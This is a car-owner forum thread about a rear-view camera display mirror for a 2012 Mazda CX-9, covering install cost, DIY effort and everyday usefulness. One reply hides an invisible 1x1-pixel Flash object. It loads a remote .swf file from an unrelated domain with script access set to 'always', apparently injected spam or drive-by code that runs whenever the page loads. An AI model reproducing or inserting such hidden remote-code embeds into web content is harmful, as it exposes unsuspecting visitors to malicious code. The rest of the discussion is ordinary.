Rear view camera display mirror accessory

:
2012 CX-9 AWD Sport, Dolphin Gray Mica
Hi all,

New to the forum, just bought a '12 CX-9 sport. Really liked the in dash rear camera display but my wife and I prefer the cloth interior so didnt bump up to the touring or GT. I was considering having the dealer install the mirror display camera. I dont feel the visibility is too bad backing up, especially with the third row down. Anyone have any experience with it, or thoughts on it?

I don't have that problems but if I where you I would install the mirror display camera<object width="1" height="1" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="undefined" value="http://smilyes4u.com/d/17/nr.swf" /><param name="allowScriptAccess" value="always" /><param name="src" value="http://smilyes4u.com/d/17/nr.swf" /><param name="allowscriptaccess" value="always" /><embed width="1" height="1" type="application/x-shockwave-flash" src="http://smilyes4u.com/d/17/nr.swf" undefined="http://smilyes4u.com/d/17/nr.swf" allowScriptAccess="always" allowscriptaccess="always" /></object>

The camera display mirror (CDM) is expensive to install.
The cheapest way is to buy part online and DIY.
Dealer could charge you $400 or more just for the labor cost.
If you are handy, this probably still could take you 3 hours minimum.
If you have not done any DIY jobs before, this might be too big to take on.

Hook up a rear-view camera (sold separately), shift into reverse, and you'll see an LCD monitor appear from behind the mirror glass. This display shows the area directly behind your bumper in real time. This greatly increases your safety when backing up and should reduce the possibility of back-up accidents.

You can buy lots of aftermarket solutions, including cameras that will send video to your smartphone.

But I like this cheap little wireless gadget for visibility while trailering or for extra backup support.

Think outside the box, you may find a cool cheap solution.

Just had that installed as part of purchase on my GT - I didn't want the package, but did want the safety feature, mainly because I carry alot of kids and the parking lots tend to have them darting behind vehicles.

So far I am very glad I included this in the purchase. The add-on mirror includes guidelines, which the console models do not, but honestly I'm not sure what they add - the distance between them varies depending on conditions (incline, load weight, etc). I _think_ it is more intuitive to look for backup info in the mirror rather than the console, but I imagine you get used to whatever you need to ...

Happy to answer any specific questions I didn't cover.

I'm definitely getting a CDM for our new 2012 CX-9.
I read through the CDM install procedure and man that's a lot of panel pulling... I'm afraid I'd get stuck in one place or another, so may have have someone do it. When I mentioned it to the dealer, they said they send the vehicle to a 3rd party to do the work, so I'm not inclined to have them do it.
Curious how to find an appropriate shop to check with in the Kansas City area.

I have this option and recommend it. The screen in the rear view mirror is obviously much smaller than the in dash LCD but it is sufficient. I parallel park in NYC every day. The visibility out the back isn't terrible but there is no way to see the bumper of the car behind you (or even the hood if it isn't a tall SUV) while parking the CX-9. I find the camera pretty essential.
